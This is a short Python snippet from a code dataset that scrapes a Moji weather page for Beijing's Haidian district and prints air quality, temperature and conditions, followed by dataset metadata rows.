# NOTE(review): no error handling — a network failure or a page-layout
# change (find() returning None) will raise here; confirm that is acceptable.
url = urlopen('https://tianqi.moji.com/weather/china/beijing/haidian-district')
soup = BeautifulSoup(url, 'html.parser')
# First <em> inside the alert box holds the air-quality text.
alert = soup.find('div', class_="wea_alert clearfix").em
print("空气质量:" + alert.string)
# In the weather box, <em> is the current temperature and <b> the
# weather description.
weather = soup.find('div', class_="wea_weather clearfix")
print("当前温度:" + weather.em.string)
print("天气:" + weather.b.string)
| [
"dandanlemuria@gmail.com"
] | dandanlemuria@gmail.com |
111acc01dc097c4210bb5a6ad10ee46e028fafb2 | 2422e19d8d897c0f08f771abab7678ba75d6420c | /venv/lib/python3.6/os.py | 9756f9f1a0f43865bf6f03b703da672343eac01d | [] | no_license | Sagar5885/PythonRef | 7f3a81888ac75acf599dee365c9e4ff6a1a96ed1 | 9bc203e379f4c15f12f883cee306bcb4e72607cf | refs/heads/master | 2021-05-11T03:06:36.123468 | 2021-02-09T20:59:48 | 2021-02-09T20:59:48 | 117,907,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43 | py | /Users/sdodia/anaconda3/lib/python3.6/os.py | [
"sdodia@walmartlabs.com"
] | sdodia@walmartlabs.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.